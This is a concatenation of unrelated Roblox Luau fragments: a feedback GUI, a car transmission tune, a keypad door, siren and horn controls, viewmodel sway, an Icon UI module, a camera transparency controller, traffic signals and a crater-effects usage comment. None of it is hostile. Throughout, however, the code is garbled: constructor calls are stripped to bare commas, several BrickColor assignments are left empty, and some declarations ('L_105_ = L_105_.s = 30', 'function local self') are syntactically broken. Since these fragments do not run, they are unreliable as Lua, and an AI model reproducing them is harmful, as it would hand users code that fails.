feedbackMain.CharactersLeft.Text = maxCharacters - #feedbackMain.InputBox.Input.Text feedbackMain.InputBox.Input.Changed:Connect(function() feedbackMain.CharactersLeft.Text = maxCharacters - #feedbackMain.InputBox.Input.Text if maxCharacters - #feedbackMain.InputBox.Input.Text < 0 then feedbackMain.CharactersLeft.TextColor3 = Color3.fromRGB(255,50,50) feedbackMain.SendButton.Style = Enum.ButtonStyle.RobloxRoundButton else feedbackMain.CharactersLeft.TextColor3 = Color3.fromRGB(255,255,255) feedbackMain.SendButton.Style = Enum.ButtonStyle.RobloxRoundDefaultButton end end) local db = false feedbackMain.SendButton.MouseButton1Click:Connect(function() if not db and maxCharacters - #feedbackMain.InputBox.Input.Text >= 0 then db = true local msg = feedbackMain.InputBox.Input.Text feedbackMain.InputBox.Input.Text = "Sending Message..." local response = game.ReplicatedStorage.FilteringFunction:InvokeServer(msg) feedbackMain.InputBox.Input.Text = response wait(5) if feedbackMain.InputBox.Input.Text == response then feedbackMain.InputBox.Input.Text = "Type feedback/bug report here" end db = false end end) script.Parent.Button.MouseButton1Click:Connect(function() open = not open if open then feedbackMain:TweenPosition(,-300,1,-300),"Out","Quint",0.3,true) else feedbackMain:TweenPosition(,100,1,-300),"Out","Quint",0.3,true) end end)
-- Etc
local DESTROY_ON_DEATH = getValueFromConfig("DestroyOnDeath") local RAGDOLL_ENABLED = getValueFromConfig("RagdollEnabled") local DEATH_DESTROY_DELAY = 5 local PATROL_WALKSPEED = 12 local MIN_REPOSITION_TIME = 2 local MAX_REPOSITION_TIME = 10 local MAX_PARTS_PER_HEARTBEAT = 50 local SEARCH_DELAY = 1
local function JumpEffect(jumpingChar) local platform = oriPlatform:Clone() platform.CFrame = (,hum.HipHeight/2,0))*CFrame.Angles(0,0,math.rad(90)) platform.Parent = workspace tween:Create(platform,, {Size =, 10, 10)}):Play() tween:Create(platform,, Enum.EasingStyle.Quint, Enum.EasingDirection.In), {Transparency = 1}):Play() tween:Create(platform.Decal,, {Transparency = 1}):Play() wait(0.8) platform:Destroy() end
Tune.TransModes = {"Manual"} --[[ [Modes] "Auto" : Automatic shifting "Semi" : Clutchless manual shifting, dual clutch transmission "Manual" : Manual shifting with clutch >Include within brackets eg: {"Semi"} or {"Auto", "Manual"} >First mode is default mode ]] --Automatic Settings Tune.AutoShiftMode = "RPM" --[[ [Modes] "Speed" : Shifts based on wheel speed "RPM" : Shifts based on RPM ]] Tune.AutoUpThresh = -200 -- Automatic upshift point (relative to peak RPM, positive = Over-rev) Tune.AutoDownThresh = 1400 -- Automatic downshift point (relative to peak RPM, positive = Under-rev) Tune.ShiftTime = .3 -- The time delay in which you initiate a shift and the car changes gear --Gear Ratios Tune.FinalDrive = 3.45 -- [TRANSMISSION CALCULATIONS FOR NERDS] Tune.Ratios = { -- SPEED [SPS] = (Wheel diameter(studs) * math.pi * RPM) / (60 * Gear Ratio * Final Drive * Multiplier) --[[ R ]] 3.3 ,-- WHEEL TORQUE = Engine Torque * Gear Ratio * Final Drive * Multiplier --[[ N ]] 0 , --[[ 1 ]] 16.6 , --[[ 2 ]] 11.2 , --[[ 3 ]] 6.7 , --[[ 4 ]] 4.5 , --[[ 5 ]] 3.5 , } Tune.FDMult = 1 -- Ratio multiplier (keep this at 1 if car is not struggling with torque)
for Number, Instance in pairs(game.Workspace:GetChildren()) do if Instance:IsA("Part") and Instance.Name == "Union" or "Pipe Part" or "Pipe" then Instance.Touched:Connect(function(Hit) local Player = PlayerService:GetPlayerFromCharacter(Hit.Parent) if not Player then return end Player.Character:FindFirstChild("Humanoid").Sit = true end) end end
--// F key, Horn
UserInputService.InputEnded:Connect(function(input,gameprocessedevent) if gameprocessedevent == false then if input.KeyCode == Enum.KeyCode.F then event:FireServer("HornOff") end end end)
--// Positioning
RightArmPos =, 0.295501232, -1.32277012, 1, 0, 0, 0, 1.19248806e-08, 1, 0, -1, 1.19248806e-08); LeftArmPos =, 0.654529691, -1.92835343, 0.787567914, -0.220087856, 0.575584888, -0.615963876, -0.308488727, 0.724860668, 0.0180283934, -0.925416589, -0.378522098); GunPos =, -0.318524063, 1.06423128, 1, 0, 0, 0, -2.98023224e-08, -0.99999994, 0, 0.99999994, -2.98023224e-08); } return Settings
end end function ToogleLock(status) for i,v in pairs(Car:GetDescendants()) do if v.ClassName == "VehicleSeat" or v.ClassName == "Seat" then v.Disabled = status end end end
local hitPart = script.Parent local debounce = true local tool = game.ServerStorage.Flies
--created by ------------------------------------------ --Clear And Enter
function Clear() print("Cleared") script.Parent.B0.ClickS:Play() Input = "" end script.Parent.Clear.ClickDetector.MouseClick:connect(Clear) function Enter() if Input == Code then print("Entered") Input = "" local door = script.Parent.Parent.Door local decal1 = script.Parent.Parent.Door.TEX1 local decal2 = script.Parent.Parent.Door.TEX2 door.CanCollide = false decal1.Transparency = decal1.Transparency + .1 decal2.Transparency = decal2.Transparency + .1 -- OPENING SOUND -- script.Parent.Parent.Door.OPEN:Play() door.Transparency = door.Transparency + 0.1 wait(TIEMPO) decal1.Transparency = decal1.Transparency + .1 decal2.Transparency = decal2.Transparency + .1 door.Transparency = door.Transparency + 0.1 wait(TIEMPO) decal1.Transparency = decal1.Transparency + .1 decal2.Transparency = decal2.Transparency + .1 door.Transparency = door.Transparency + 0.1 wait(TIEMPO) decal1.Transparency = decal1.Transparency + .1 decal2.Transparency = decal2.Transparency + .1 door.Transparency = door.Transparency + 0.1 wait(TIEMPO) decal1.Transparency = decal1.Transparency + .1 decal2.Transparency = decal2.Transparency + .1 door.Transparency = door.Transparency + 0.1 wait(TIEMPO) decal1.Transparency = decal1.Transparency + .1 decal2.Transparency = decal2.Transparency + .1 door.Transparency = door.Transparency + 0.1 wait(TIEMPO) decal1.Transparency = decal1.Transparency + .1 decal2.Transparency = decal2.Transparency + .1 door.Transparency = door.Transparency + 0.1 wait(TIEMPO) decal1.Transparency = decal1.Transparency + .1 decal2.Transparency = decal2.Transparency + .1 door.Transparency = 0.8 wait(3) -- CLOSING SOUND -- script.Parent.Parent.Door.CLOSE:Play() decal1.Transparency = decal1.Transparency - .1 decal2.Transparency = decal2.Transparency - .1 door.Transparency = door.Transparency - 0.1 wait(TIEMPO) decal1.Transparency = decal1.Transparency - .1 decal2.Transparency = decal2.Transparency - .1 door.Transparency = door.Transparency - 0.1 wait(TIEMPO) decal1.Transparency = decal1.Transparency - .1 decal2.Transparency = decal2.Transparency - .1 door.Transparency = door.Transparency - 0.1 wait(TIEMPO) decal1.Transparency = decal1.Transparency - .1 decal2.Transparency = decal2.Transparency - .1 door.Transparency = door.Transparency - 0.1 wait(TIEMPO) decal1.Transparency = decal1.Transparency - .1 decal2.Transparency = decal2.Transparency - .1 door.Transparency = door.Transparency - 0.1 wait(TIEMPO) decal1.Transparency = decal1.Transparency - .1 decal2.Transparency = decal2.Transparency - .1 door.Transparency = door.Transparency - 0.1 wait(TIEMPO) decal1.Transparency = decal1.Transparency - .1 decal2.Transparency = decal2.Transparency - .1 door.Transparency = door.Transparency - 0.1 wait(TIEMPO) decal1.Transparency = decal1.Transparency - .1 decal2.Transparency = decal2.Transparency - .1 door.Transparency = 0 door.CanCollide = true return end Input = "" print("Wrong Code") if SounDebounce == true then SounDebounce = false script.Parent.B0.Wrong:Play() script.Parent.B0.Wrong.Ended:Wait() SounDebounce = true end end script.Parent.Enter.ClickDetector.MouseClick:connect(Enter)
--// F key, Horn
mouse.KeyDown:connect(function(key) if key=="f" then veh.ELS.Sirens.AH.Transparency = 0 veh.ELS.Siren.Airhorn:Play() veh.ELS.Siren2.Airhorn:Play() veh.ELS.Sirens.Horn.Transparency = 0 veh.ELS.Siren.Wail.Volume = 0 veh.ELS.Siren.Yelp.Volume = 0 veh.ELS.Siren.Priority.Volume = 0 veh.ELS.Siren2.Wail.Volume = 0 veh.ELS.Siren2.Yelp.Volume = 0 veh.ELS.Siren2.Priority.Volume = 0 end end)
--// Math
local L_104_ = function(L_141_arg1, L_142_arg2, L_143_arg3) if L_141_arg1 > L_143_arg3 then return L_143_arg3 elseif L_141_arg1 < L_142_arg2 then return L_142_arg2 end return L_141_arg1 end local L_105_ = L_105_.s = 30 L_105_.d = 0.55 local L_106_ = CFrame.Angles(0, 0, 0)
-- perform the update loop -- do the R6 update loop
stepped_con = game:GetService("RunService").RenderStepped:Connect(function() swaysize = script.WalkSwayMultiplier.Value -- checkfirstperson() checks if camera is first person and enables/disables the viewmodel accordingly checkfirstperson() -- update loop if isfirstperson == true then local modifierr = 0 local statething = player:GetAttribute('State') -- make arms visible if larm.LocalTransparencyModifier ~= 0 then visiblearms(true) end -- update walk sway if we are walking if isrunning == true and includewalksway and humanoid:GetState() ~= Enum.HumanoidStateType.Freefall and humanoid:GetState() ~= Enum.HumanoidStateType.Landed then walksway = walksway:lerp( (0.07*swaysize) * math.sin(tick() * (2 * humanoid.WalkSpeed/4)), (0.07*swaysize) * math.cos(tick() * (4 * humanoid.WalkSpeed/4)), 0 )* CFrame.Angles( 0, 0, (-.03*swaysize) * math.sin(tick() * (2 * humanoid.WalkSpeed/4)) ) ,0.2*sensitivity) else walksway = walksway:Lerp(, 0.05*sensitivity) end -- local delta = uis:GetMouseDelta() -- if includecamerasway then sway = sway:Lerp(,delta.Y,delta.X/2), 0.1*sensitivity) end -- if includestrafe then strafesway = strafesway:Lerp(CFrame.Angles(0,0,-rootpart.CFrame.rightVector:Dot(humanoid.MoveDirection)/(20/swaysize)), 0.1*sensitivity) end -- if includejumpsway == true then jumpsway = jumpswaygoal.Value end -- update animation transform for viewmodel rightshoulderclone.Transform = rightshoulder.Transform leftshoulderclone.Transform = leftshoulder.Transform -- cframe the viewmodel if statething ~= nil and statething == "Crouching" and player.Character:FindFirstChildWhichIsA("Tool") then modifierr = 20 end if statething ~= nil and statething == "Crawling" and player.Character:FindFirstChildWhichIsA("Tool") then modifierr = 80 end local CamY, CamX, CamZ = camera.CFrame:ToEulerAnglesYXZ() local direction = math.rad(player.Character.HumanoidRootPart.CFrame.RightVector:Dot((-player.Character.HumanoidRootPart.Velocity *,0,1)).Unit) * 200), math.rad(player.Character.HumanoidRootPart.CFrame.LookVector:Dot((-player.Character.HumanoidRootPart.Velocity *,0,1)).Unit) * 200) ) local tilt = direction.Unit * math.clamp((player.Character.HumanoidRootPart.Velocity.Magnitude / 14), 0, 2) local firstframe =,camera.CFrame.Position.Y,camera.CFrame.Position.Z) ) * CFrame.fromEulerAnglesXYZ(CamY + math.rad(modifierr),0,0) local TorsX,TorsY,TorsZ = player.Character.Torso.CFrame.Rotation:ToEulerAnglesXYZ() local torsoframe = CFrame.Angles(TorsX,TorsY,TorsZ) local countercf = if script.CFrameAimOffset.Value.Position.X ~= 0 or not (script.CFrameAimOffset.Value.Position.X <= 0.1) then --countercf = CFrame.Angles(math.rad(-tilt.Y * 3),math.rad(-tilt.X * 4),math.rad(-tilt.X * 6)) end local finalcf = (*torsoframe*firstframe.Rotation*walksway*jumpsway*strafesway*countercf*CFrame.Angles(math.rad(sway.Y*swaysize),math.rad(sway.X*swaysize)/10,math.rad(sway.Z*swaysize)/2))+(camera.CFrame.UpVector*(-1.7-(headoffset.Y+(aimoffset.Value.Y))))+(camera.CFrame.LookVector*(headoffset.Z+(aimoffset.Value.Z)))+(camera.CFrame.RightVector*(-headoffset.X-(aimoffset.Value.X)+(-(sway.X*swaysize)/75))) local builtcf = finalcf * script.CFrameAimOffset.Value:Inverse() viewmodel:SetPrimaryPartCFrame(builtcf) end end)
function Icon:setLabel(text, iconState) text = text or "" self:set("iconText", text, iconState) return self end function Icon:setCornerRadius(scale, offset, iconState) local oldCornerRadius = self.instances.iconCorner.CornerRadius local newCornerRadius = or oldCornerRadius.Scale, offset or oldCornerRadius.Offset) self:set("iconCornerRadius", newCornerRadius, iconState) return self end function Icon:setImage(imageId, iconState) local textureId = (tonumber(imageId) and ""..imageId) or imageId or "" return self:set("iconImage", textureId, iconState) end function Icon:setOrder(order, iconState) local newOrder = tonumber(order) or 1 return self:set("order", newOrder, iconState) end function Icon:setLeft(iconState) return self:set("alignment", "left", iconState) end function Icon:setMid(iconState) return self:set("alignment", "mid", iconState) end function Icon:setRight(iconState) return self:set("alignment", "right", iconState) end function Icon:setImageYScale(YScale, iconState) local newYScale = tonumber(YScale) or 0.63 return self:set("iconImageYScale", newYScale, iconState) end function Icon:setImageRatio(ratio, iconState) local newRatio = tonumber(ratio) or 1 return self:set("iconImageRatio", newRatio, iconState) end function Icon:setLabelYScale(YScale, iconState) local newYScale = tonumber(YScale) or 0.45 return self:set("iconLabelYScale", newYScale, iconState) end function Icon:setBaseZIndex(ZIndex, iconState) local newBaseZIndex = tonumber(ZIndex) or 1 return self:set("baseZIndex", newBaseZIndex, iconState) end function Icon:_updateBaseZIndex(baseValue) local container = self.instances.iconContainer local newBaseValue = tonumber(baseValue) or container.ZIndex local difference = newBaseValue - container.ZIndex if difference == 0 then return "The baseValue is the same" end for _, object in pairs(self.instances) do object.ZIndex = object.ZIndex + difference end return true end function Icon:setSize(XOffset, YOffset, iconState) local newXOffset = tonumber(XOffset) or 32 local newYOffset = tonumber(YOffset) or newXOffset self:set("forcedIconSize",, newXOffset, 0, newYOffset), iconState) self:set("iconSize",, newXOffset, 0, newYOffset), iconState) return self end function Icon:_updateIconSize(_, iconState) if self._destroyed then return end -- This is responsible for handling the appearance and size of the icons label and image, in additon to its own size local X_MARGIN = 12 local X_GAP = 8 local values = { iconImage = self:get("iconImage", iconState) or "_NIL", iconText = self:get("iconText", iconState) or "_NIL", iconSize = self:get("iconSize", iconState) or "_NIL", forcedIconSize = self:get("forcedIconSize", iconState) or "_NIL", iconImageYScale = self:get("iconImageYScale", iconState) or "_NIL", iconImageRatio = self:get("iconImageRatio", iconState) or "_NIL", iconLabelYScale = self:get("iconLabelYScale", iconState) or "_NIL", } for k,v in pairs(values) do if v == "_NIL" then return end end local iconContainer = self.instances.iconContainer local iconLabel = self.instances.iconLabel if not iconContainer.Parent then return end -- We calculate the cells dimensions as apposed to reading because there's a possibility the cells dimensions were changed at the exact time and have not yet updated -- this essentially saves us from waiting a heartbeat which causes additonal complications local cellSizeXOffset = values.iconSize.X.Offset local cellSizeXScale = values.iconSize.X.Scale local cellWidth = cellSizeXOffset + (cellSizeXScale * iconContainer.Parent.AbsoluteSize.X) local minCellWidth = values.forcedIconSize.X.Offset--cellWidth local maxCellWidth = (cellSizeXScale > 0 and cellWidth) or 9999 local cellSizeYOffset = values.iconSize.Y.Offset local cellSizeYScale = values.iconSize.Y.Scale local cellHeight = cellSizeYOffset + (cellSizeYScale * iconContainer.Parent.AbsoluteSize.Y) local labelHeight = cellHeight * values.iconLabelYScale local labelWidth = textService:GetTextSize(values.iconText, labelHeight, iconLabel.Font,, labelHeight)).X local imageWidth = cellHeight * values.iconImageYScale * values.iconImageRatio local usingImage = values.iconImage ~= "" local usingText = values.iconText ~= "" local notifPosYScale = 0.5 local desiredCellWidth if usingImage and not usingText then notifPosYScale = 0.45 self:set("iconImageVisible", true, iconState) self:set("iconImageAnchorPoint",, 0.5), iconState) self:set("iconImagePosition",, 0, 0.5, 0), iconState) self:set("iconImageSize",*values.iconImageRatio, 0, values.iconImageYScale, 0), iconState) self:set("iconLabelVisible", false, iconState) elseif not usingImage and usingText then desiredCellWidth = labelWidth+(X_MARGIN*2) self:set("iconLabelVisible", true, iconState) self:set("iconLabelAnchorPoint",, 0.5), iconState) self:set("iconLabelPosition",, X_MARGIN, 0.5, 0), iconState) self:set("iconLabelSize",, -X_MARGIN*2, values.iconLabelYScale, 0), iconState) self:set("iconLabelTextXAlignment", Enum.TextXAlignment.Center, iconState) self:set("iconImageVisible", false, iconState) elseif usingImage and usingText then local labelGap = X_MARGIN + imageWidth + X_GAP desiredCellWidth = labelGap + labelWidth + X_MARGIN self:set("iconImageVisible", true, iconState) self:set("iconImageAnchorPoint",, 0.5), iconState) self:set("iconImagePosition",, X_MARGIN, 0.5, 0), iconState) self:set("iconImageSize",, imageWidth, values.iconImageYScale, 0), iconState) ---- self:set("iconLabelVisible", true, iconState) self:set("iconLabelAnchorPoint",, 0.5), iconState) self:set("iconLabelPosition",, labelGap, 0.5, 0), iconState) self:set("iconLabelSize",, -labelGap-X_MARGIN, values.iconLabelYScale, 0), iconState) self:set("iconLabelTextXAlignment", Enum.TextXAlignment.Left, iconState) end if desiredCellWidth then if not self._updatingIconSize then self._updatingIconSize = true local widthScale = (cellSizeXScale > 0 and cellSizeXScale) or 0 local widthOffset = (cellSizeXScale > 0 and 0) or math.clamp(desiredCellWidth, minCellWidth, maxCellWidth) self:set("iconSize",, widthOffset, values.iconSize.Y.Scale, values.iconSize.Y.Offset), iconState, "_ignorePrevious") self._updatingIconSize = false end end self:set("iconLabelTextSize", labelHeight, iconState) self:set("noticeFramePosition",, 0, 0, -2), iconState) -- Caption if self.captionText then local CAPTION_X_MARGIN = 6 local CAPTION_CONTAINER_Y_SIZE_SCALE = 0.8 local CAPTION_LABEL_Y_SCALE = 0.58 local captionContainer = self.instances.captionContainer local captionLabel = self.instances.captionLabel local captionContainerHeight = cellHeight * CAPTION_CONTAINER_Y_SIZE_SCALE local captionLabelHeight = captionContainerHeight * CAPTION_LABEL_Y_SCALE local labelFont = self:get("captionFont") local textWidth = textService:GetTextSize(self.captionText, captionLabelHeight, labelFont,, captionLabelHeight)).X captionLabel.TextSize = captionLabelHeight captionLabel.Size =, textWidth, CAPTION_LABEL_Y_SCALE, 0) captionContainer.Size =, textWidth + CAPTION_X_MARGIN*2, 0, cellHeight*CAPTION_CONTAINER_Y_SIZE_SCALE) end self._updatingIconSize = false end
while true do script.Parent.Parent.SignalValues.Signal1.Value = 0 script.Parent.Parent.SignalValues.Signal1a.Value = 0 script.Parent.Parent.SignalValues.Signal2.Value = 0 script.Parent.Parent.SignalValues.Signal2a.Value = 0 script.Parent.Parent.TurnValues.TurnSignal1.Value = 0 script.Parent.Parent.TurnValues.TurnSignal1a.Value = 0 script.Parent.Parent.TurnValues.TurnSignal2.Value = 0 script.Parent.Parent.TurnValues.TurnSignal2a.Value = 0 script.Parent.Parent.PedValues.PedSignal1.Value = 0 script.Parent.Parent.PedValues.PedSignal1a.Value = 0 script.Parent.Parent.PedValues.PedSignal2.Value = 0 script.Parent.Parent.PedValues.PedSignal2a.Value = 0 wait() end
local function PlayerTouched(Part) local Parent = Part.Parent if game.Players:GetPlayerFromCharacter(Parent) then wait(1) Parent.Humanoid.Health = 0 end end Brick.Touched:connect(PlayerTouched)
--[[ The Module ]]
-- local TransparencyController = {} TransparencyController.__index = TransparencyController function local self = setmetatable({}, TransparencyController) self.lastUpdate = tick() self.transparencyDirty = false self.enabled = false self.lastTransparency = nil self.descendantAddedConn, self.descendantRemovingConn = nil, nil self.toolDescendantAddedConns = {} self.toolDescendantRemovingConns = {} self.cachedParts = {} return self end function TransparencyController:HasToolAncestor(object) if object.Parent == nil then return false end return object.Parent:IsA('Tool') or self:HasToolAncestor(object.Parent) end function TransparencyController:IsValidPartToModify(part) if part:IsA('BasePart') or part:IsA('Decal') then return not self:HasToolAncestor(part) end return false end function TransparencyController:CachePartsRecursive(object) if object then if self:IsValidPartToModify(object) then self.cachedParts[object] = true self.transparencyDirty = true end for _, child in pairs(object:GetChildren()) do self:CachePartsRecursive(child) end end end function TransparencyController:TeardownTransparency() for child, _ in pairs(self.cachedParts) do child.LocalTransparencyModifier = 0 end self.cachedParts = {} self.transparencyDirty = true self.lastTransparency = nil if self.descendantAddedConn then self.descendantAddedConn:disconnect() self.descendantAddedConn = nil end if self.descendantRemovingConn then self.descendantRemovingConn:disconnect() self.descendantRemovingConn = nil end for object, conn in pairs(self.toolDescendantAddedConns) do conn:Disconnect() self.toolDescendantAddedConns[object] = nil end for object, conn in pairs(self.toolDescendantRemovingConns) do conn:Disconnect() self.toolDescendantRemovingConns[object] = nil end end function TransparencyController:SetupTransparency(character) self:TeardownTransparency() if self.descendantAddedConn then self.descendantAddedConn:disconnect() end self.descendantAddedConn = character.DescendantAdded:Connect(function(object) -- This is a part we want to invisify if self:IsValidPartToModify(object) then self.cachedParts[object] = true self.transparencyDirty = true -- There is now a tool under the character elseif object:IsA('Tool') then if self.toolDescendantAddedConns[object] then self.toolDescendantAddedConns[object]:Disconnect() end self.toolDescendantAddedConns[object] = object.DescendantAdded:Connect(function(toolChild) self.cachedParts[toolChild] = nil if toolChild:IsA('BasePart') or toolChild:IsA('Decal') then -- Reset the transparency toolChild.LocalTransparencyModifier = 0 end end) if self.toolDescendantRemovingConns[object] then self.toolDescendantRemovingConns[object]:disconnect() end self.toolDescendantRemovingConns[object] = object.DescendantRemoving:Connect(function(formerToolChild) wait() -- wait for new parent if character and formerToolChild and formerToolChild:IsDescendantOf(character) then if self:IsValidPartToModify(formerToolChild) then self.cachedParts[formerToolChild] = true self.transparencyDirty = true end end end) end end) if self.descendantRemovingConn then self.descendantRemovingConn:disconnect() end self.descendantRemovingConn = character.DescendantRemoving:connect(function(object) if self.cachedParts[object] then self.cachedParts[object] = nil -- Reset the transparency object.LocalTransparencyModifier = 0 end end) self:CachePartsRecursive(character) end function TransparencyController:Enable(enable) if self.enabled ~= enable then self.enabled = enable self:Update() end end function TransparencyController:SetSubject(subject) local character = nil if subject and subject:IsA("Humanoid") then character = subject.Parent end if subject and subject:IsA("VehicleSeat") and subject.Occupant then character = subject.Occupant.Parent end if character then self:SetupTransparency(character) else self:TeardownTransparency() end end function TransparencyController:Update() local instant = false local now = tick() local currentCamera = workspace.CurrentCamera if currentCamera then local transparency = 0 if not self.enabled then instant = true else local distance = (currentCamera.Focus.p - currentCamera.CoordinateFrame.p).magnitude transparency = (distance<2) and (1.0-(distance-0.5)/1.5) or 0 --(7 - distance) / 5 if transparency < 0.5 then transparency = 0 end if self.lastTransparency then local deltaTransparency = transparency - self.lastTransparency -- Don't tween transparency if it is instant or your character was fully invisible last frame if not instant and transparency < 1 and self.lastTransparency < 0.95 then local maxDelta = MAX_TWEEN_RATE * (now - self.lastUpdate) deltaTransparency = math.clamp(deltaTransparency, -maxDelta, maxDelta) end transparency = self.lastTransparency + deltaTransparency else self.transparencyDirty = true end transparency = math.clamp(Util.Round(transparency, 2), 0, 1) end if self.transparencyDirty or self.lastTransparency ~= transparency then for child, _ in pairs(self.cachedParts) do child.LocalTransparencyModifier = transparency end self.transparencyDirty = false self.lastTransparency = transparency end end self.lastUpdate = now end return TransparencyController
--------END RIGHT DOOR --------
game.Workspace.doorleft.l11.BrickColor = game.Workspace.doorleft.l12.BrickColor = game.Workspace.doorleft.l13.BrickColor = game.Workspace.doorleft.l41.BrickColor = game.Workspace.doorleft.l42.BrickColor = game.Workspace.doorleft.l43.BrickColor = game.Workspace.doorleft.l71.BrickColor = game.Workspace.doorleft.l72.BrickColor = game.Workspace.doorleft.l73.BrickColor = game.Workspace.doorright.l11.BrickColor = game.Workspace.doorright.l12.BrickColor = game.Workspace.doorright.l13.BrickColor = game.Workspace.doorright.l41.BrickColor = game.Workspace.doorright.l42.BrickColor = game.Workspace.doorright.l43.BrickColor = game.Workspace.doorright.l71.BrickColor = game.Workspace.doorright.l72.BrickColor = game.Workspace.doorright.l73.BrickColor = wait(0.1) game.Workspace.doorleft.l21.BrickColor = game.Workspace.doorleft.l22.BrickColor = game.Workspace.doorleft.l23.BrickColor = game.Workspace.doorleft.l51.BrickColor = game.Workspace.doorleft.l52.BrickColor = game.Workspace.doorleft.l53.BrickColor = game.Workspace.doorright.l21.BrickColor = game.Workspace.doorright.l22.BrickColor = game.Workspace.doorright.l23.BrickColor = game.Workspace.doorright.l51.BrickColor = game.Workspace.doorright.l52.BrickColor = game.Workspace.doorright.l53.BrickColor = wait(0.1) game.Workspace.doorleft.l31.BrickColor = game.Workspace.doorleft.l32.BrickColor = game.Workspace.doorleft.l33.BrickColor = game.Workspace.doorleft.l61.BrickColor = game.Workspace.doorleft.l62.BrickColor = game.Workspace.doorleft.l63.BrickColor = game.Workspace.doorright.l31.BrickColor = game.Workspace.doorright.l32.BrickColor = game.Workspace.doorright.l33.BrickColor = game.Workspace.doorright.l61.BrickColor = game.Workspace.doorright.l62.BrickColor = game.Workspace.doorright.l63.BrickColor =
-- you can mess with these settings
local easingtime = 0.1 --0~1 local walkspeeds = { enabled = true; walkingspeed = 35; backwardsspeed = 25; sidewaysspeed = 34; diagonalspeed = 38; runningspeed = 50; runningFOV= 120; }
-- Customization
AntiTK = false; MouseSense = 0.5; CanAim = true; CanBolt = true; LaserAttached = false; LightAttached = false; TracerEnabled = false;
--// Beam flag wavy thing --// Written by Informable/Autumn --// Do not distribute without this header
local beam = script.Parent.Beam local p1 = script.Parent.End local p2 = script.Parent.Start local cf1 = p1.CFrame local cf2 = p2.CFrame local cos = 0 local noise = 0 local noise2 = 0 math.randomseed(tick()) local seed1 = math.random()*3+2 local seed2 = math.random()*3+2 local seed3 = math.random()*3+2 game:GetService("RunService").Stepped:connect(function() cos = cos + .05 noise = noise + .1 noise2 = noise2 + .2 local noiser1 = math.noise(seed1,noise/35,noise/35)*3 local noiser2 = math.noise(seed2*3+2,noise2/42,noise2/42)*3 local noiser3 =math.noise(seed3*3+2,noise2/27,noise2/27)*3 p1.CFrame = cf1*,0,0)*CFrame.Angles(0,math.cos(cos/2)*noiser3/3.5-1.5,0) p2.CFrame = cf2*CFrame.Angles(0,math.sin(cos/3.5)/2+noiser2/3.5-1.5,0) end)
if _Tune.Aspiration ~= "Natural" then if _Tune.Aspiration == "Single" then _TCount = 1 elseif _Tune.Aspiration == "Double" then _TCount = 2 end values.Boost.Changed:connect(function() local boost = (math.floor(values.Boost.Value)*1.2)-((_Tune.Boost*_TCount)/5) inboost.Rotation = -110 + 210 * math.min(1,(values.Boost.Value/(_Tune.Boost)/_TCount)) boostguage.Text = tostring(math.floor(boost)) end) end
----------------- --| Constants |-- -----------------
local BLAST_RADIUS = script.Parent.Parent.Configurations.BlastRadius.Value -- Blast radius of the explosion local BLAST_DAMAGE = script.Parent.Parent.Configurations.Damage.Value -- Amount of damage done to players local BLAST_FORCE = script.Parent.Parent.Configurations.BlastForce.Value -- Amount of force applied to parts local IGNORE_LIST = {rocket = 1, handle = 1, effect = 1, water = 1} -- Rocket will fly through things named these
--Power Rear Wheels
if _Tune.Config == "RWD" or _Tune.Config == "AWD" then for i,v in pairs(car.Wheels:GetChildren()) do if v.Name=="RL" or v.Name=="RR" or v.Name=="R" then table.insert(Drive,v) end end end
-- maps a value from one range to another, clamping to the output range. order does not matter
function CameraUtils.mapClamp(x: number, inMin: number, inMax: number, outMin: number, outMax: number): number return math.clamp( (x - inMin)*(outMax - outMin)/(inMax - inMin) + outMin, math.min(outMin, outMax), math.max(outMin, outMax) ) end
--[[** Calls `:Cleanup()` and renders the Janitor unusable. @returns [t:void] **--]]
function Janitor.__index:Destroy() self:Cleanup() table.clear(self) setmetatable(self, nil) end Janitor.__call = Janitor.__index.Cleanup
-- BindableEvent_OnFailStateChanged = MasterControl:GetClickToMoveFailStateChanged()
--[[ TYPES: Crater Orbit Path Rounded Path Closed Path Wall Break Expanding Crater Expanding Orbit ------------------------------ PROPERTIES: PartCount -- INTEGER NUMBER TO DICTATE THE AMOUNT OF PARTS IN AN ORBIT/CRATER ATTACK Radius -- SIZE OF A CRATER/ORBIT // For expanding you must put it in list like so: {3,10}. The first value is the staring radius, and the second being the ending radius. Range -- RAYCAST MAX DISTANCE DOWNWARDS Size -- VECTOR3 VALUE DICTATING PART SIZE AnimationSpeed -- HOW FAST THE PARTS SPAWN UPWARDS BlockSize -- THE SIZE OF A BLOCK IN A PATH (NOTE: RUN THIS VIA A LIST VALUE: {3,4} THE FIRST BEING THE INITIAL SIZE AND THE SECOND BEING THE FINAL SIZE) Width -- THE WIDTH OF A PATH (NOTE: RUN THIS VIA A LIST VALUE: {3,4} THE FIRST BEING THE INITIAL WIDTH AND THE SECOND BEING THE FINAL WIDTH) Distance -- THIS IS A PATH TRAVELS stepSize -- DISTANCE BETWEEN THE PATH PARTS HoldTime -- TIME IN SECONDS BEFORE AN EFFECT DISAPPEARS delayTime -- TIME BETWEEN NEXT PART IN PATH (NOTE: PUTTING THIS TO "Stepped" MAKES THE DELAY TIME RUN IN A RUNSERVICE HEARTBEAT) Angle -- CRATER ANGLE Height -- HEIGHT OF AN EXPLOSION Collidable -- PART COLLIDABLILITY FOR WALLBREAK AND FOR EXPLOSION IncreaseSpeed -- THIS IS TO CHANGE THE ANIMATION SPEED FOR EXPANDING ORBITS OR EXPANDING CRATERS SET UP: [[ NEW ]] --[[ local craterEffects = require(craterModule), AnchorPoint, Properties) -- Lets try using orbit with a 5 radius and 8 part count at a tween speed of 0.2 'Orbit', -- This is the type of effect you want Character.HumanoidRootPart.CFrame, -- This is the start/center point (depending on the effect) { ['AnimationSpeed'] = 0.2; ['PartCount'] = 8; ['Radius'] = 5 } ) ]] --[[ PRESETS ]] --[[ local craterEffects = require(craterModule) craterEffects.presets(Presets, AnchorPoint, Extras) -- This allows you to save presets using the instructions within the 'Presets' script. craterEffects.presets( 'OFA', -- This is the type of effect you want Character.HumanoidRootPart.CFrame, -- This is the start/center point (depending on the effect) { ['AnimationSpeed'] = 0.2; ['PartCount'] = 8; ['Radius'] = 5 } ) ]]
